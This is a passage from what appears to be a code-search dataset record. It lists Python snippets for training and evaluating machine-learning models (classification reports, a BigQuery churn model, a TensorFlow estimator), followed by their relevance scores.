0\n for col in y_test:\n print('Evaluation for \"{}\": \\n {} \\n\\n'.format(col, classification_report(y_test[col], y_pred[:,i])))\n i += 1", "def trainModel( self, featureTrain, classTrain):", "def train(self):\n\t\traise NotImplementedError", "def main():\n data = load_data()\n analyze_features(data['full_features'])\n model = train(data)\n\n with open('model.pickle', 'wb') as f:\n pickle.dump(model, f)\n evaluate(model, data)", "def _train_and_evaluate(estimator, output_dir):\n \n \"\"\"X_train, y_train =utils._feature_label_split(df_train,\"is_churn\",\"msno\")\n df_val = utils.read_from_bigquery(\"amiable-octane-267022.kkbox.output_val_1\",\"amiable-octane-267022\")\n X_val, y_val =utils._feature_label_split(df_val,\"is_churn\",\"msno\")\"\"\"\n \n df_train=utils.over_sample(\"amiable-octane-267022.kkbox.output_train_1\",\"amiable-octane-267022\")\n X_train, y_train =utils._feature_label_split(df_train,\"is_churn\",\"msno\")\n df_val=utils.over_sample(\"amiable-octane-267022.kkbox.output_val_1\",\"amiable-octane-267022\")\n X_val, y_val =utils._feature_label_split(df_val,\"is_churn\",\"msno\")\n\n estimator.fit(X_train, y_train)\n f1_scorer = make_scorer(f1_score)\n accuracy_scorer =make_scorer(accuracy_score)\n\n if metadata.HYPERPARAMTER_TUNING:\n scores=model_selection.cross_val_score(estimator, X_val, y_val, cv=3,scoring=f1_scorer)\n #,scoring=f1_scorer\n\n logging.info('Score: %s', scores)\n\n #tune hyper\n hpt = hypertune.HyperTune()\n hpt.report_hyperparameter_tuning_metric(\n hyperparameter_metric_tag='F1_SCORE',\n metric_value=np.mean(scores),\n global_step=10000)\n \n#joblib.dump(estimator, 'model.joblib')\n\n # Write model and eval metrics to `output_dir`\n model_output_path = os.path.join(output_dir, 'model',metadata.MODEL_FILE_NAME)\n \n utils.dump_object(estimator, model_output_path)", "def train_and_eval():\n # train_file_name = 'adult.data'\n # test_file_name = 'adult.test'\n train_file_name = 'poker-hand-testing.data'\n test_file_name = 'poker-hand-training-true.data'\n #test_file_name = maybe_download()\n df_train = pd.read_csv(\n tf.gfile.Open(\"/opt/tensor/race_result_clean.csv\"),\n names=COLUMNS,\n skipinitialspace=True,\n skiprows=1)\n df_test = pd.read_csv(\n tf.gfile.Open(\"/opt/tensor/race_result_clean.csv\"),\n names=COLUMNS,\n skipinitialspace=True,\n skiprows=1)\n\n #df_train[LABEL_COLUMN] = (df_train[\"CLASS_Poker_Hand\"].apply(lambda x: x>5)).astype(int)\n #df_test[LABEL_COLUMN] = (df_test[\"CLASS_Poker_Hand\"].apply(lambda x: x>5)).astype(int)\n\n model_dir = tempfile.mkdtemp() if not FLAGS.model_dir else FLAGS.model_dir\n print(\"model directory = %s\" % model_dir)\n m = build_estimator(model_dir)\n print(m)\n m.fit(input_fn=lambda: input_fn(df_train), steps=FLAGS.train_steps)\n results = m.evaluate(input_fn=lambda: input_fn(df_test), steps=1)\n for key in sorted(results):\n print(\"%s: %s\" % (key, results[key]))", "def evaluate_model(model, X_test, Y_test, category_names):\n# Print out Precision , recall F1_score and support for each column using classification_report function\n y_pred_test = model.predict(X_test)\n print(classification_report(Y_test, y_pred_test, target_names=category_names))" ]
[ "0.70706695", "0.64831716", "0.64393735", "0.6433011", "0.64119494", "0.6411802", "0.6275987", "0.624839", "0.62458396", "0.62132657", "0.62124383", "0.6203546", "0.62026036", "0.6191927", "0.6183838", "0.615125", "0.61467177", "0.61371404", "0.6132172", "0.6127471", "0.6120949", "0.6096613", "0.60960996", "0.60893327", "0.6084784", "0.60640055", "0.6060898", "0.60434383", "0.6042966", "0.6038365", "0.6030956", "0.60306555", "0.6020445", "0.6016485", "0.6006332", "0.60006744", "0.6000377", "0.599327", "0.5992853", "0.59862757", "0.5985439", "0.5984907", "0.5984182", "0.5983504", "0.5973042", "0.59484214", "0.5947783", "0.59403145", "0.5936721", "0.5936721", "0.5936721", "0.5936721", "0.5936721", "0.59289986", "0.59288764", "0.59279", "0.5910644", "0.59035456", "0.59029704", "0.59016174", "0.58927417", "0.58919364", "0.58910054", "0.58811814", "0.58795", "0.5879478", "0.5877612", "0.586734", "0.5865855", "0.58624196", "0.5855473", "0.5842631", "0.5834897", "0.5831262", "0.5830949", "0.58277047", "0.5822493", "0.582085", "0.58127457", "0.5811517", "0.5804938", "0.57972646", "0.5796262", "0.5792668", "0.5791089", "0.5789042", "0.5788226", "0.5786669", "0.57853216", "0.578384", "0.57795805", "0.57728654", "0.5771019", "0.5769778", "0.57696056", "0.5769117", "0.57681394", "0.57611364", "0.5758028", "0.57576656", "0.5757561" ]
0.0
-1